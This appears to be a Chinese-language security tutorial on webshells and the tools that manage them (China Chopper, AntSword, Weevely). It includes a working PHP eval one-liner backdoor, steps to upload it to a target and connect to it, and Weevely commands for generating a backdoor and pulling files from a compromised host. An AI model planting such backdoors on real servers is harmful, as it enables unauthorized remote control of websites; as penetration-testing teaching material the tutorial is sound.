Webshell

一、Webshell

1.Webshell简介

​ Webshell是以ASP、PHP、JSP或者CGI等网页文件形式存在的一种代码执行环境，主要用于网站管理、服务器管理、权限管理等操作。

​ Webshell使用方法简单，只需上传一个代码文件，通过网址访问，便可进行很多日常操作，极大地方便了使用者对网站和服务器的管理。

​ 正因如此，也有小部分人将代码修改后当作后门程序使用，以达到控制网站服务器的目的。

2.Webshell作用

​ 一方面，Webshell常常被站长用于网站管理、服务器管理等，可以在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

​ 另一方面， Webshell也常常被入侵者利用，达到控制网站服务器的目的。这些网页脚本常称为Web脚本木马，比较流行主要是ASP或PHP木马，也有基于.NET的脚本木马与JSP脚本木马。国内常用的Webshell有海阳ASP木马Phpspy、c99shel等

3.Webshell管理工具

​ Webshell管理工具，即用来管理Webshell的工具，其功能类似于木马的控制端程序，它集成了许多实用的小工具，方便攻击者对Webshell进行管理。

​ 常见的Webshell管理工具有中国菜刀（Chopper)、蚁剑（AntSword)、冰蝎（Behinder)、Weevely等

3.1 菜刀

​ 中国菜刀是一款专业的Webshell管理软件，用途广泛，使用方便，小巧实用。只要支持动态脚本的网站，都可以用中国菜刀来进行管理。

菜刀使用实例：

步骤1：在攻击机上新建一句话木马phpma.php，内容为：<? @eval（$_POST['hacker']); ?>

注：“hacker”为木马的连接密码

步骤2：将phpma.php上传至目标机，并记录上传的路径

步骤3：利用菜刀连接phpma.php，添加shell地址，并填写连接密码

步骤4：成功连接phpma.php，可以执行文件管理操作

3.2 蚁剑

​ 蚁剑是一个开放源代码、跨平台的Webshell管理工具，旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。相比于菜刀，蚁剑的功能更强大。

组成：

• 项目核心源码antSword
• 加载器

常用功能：

• 虚拟终端
• 文件管理
• 数据操作

3.3 Weevely

​ Weevely是一款Python编写的Webshell管理工具，它最大的优点在于跨平台可以算作是Linux下的一款菜刀替代工具（限于PHP)。Kali Linux自带Weevely。

基本命令：

• weevely generate <password> <path> //生成专用木马

  注：密码长度最小为4

• weevely <url> <password> <path> //远程连接木马或执行命令

模块调用：

连接木马后会得到shell，可以输入help调用weevely模块。

• file_ls：查看文件及目录

• system_info：查看系统信息

• file_download：将远程目录下载到本地

  例：file_download test.jpg /usr/test1.jpg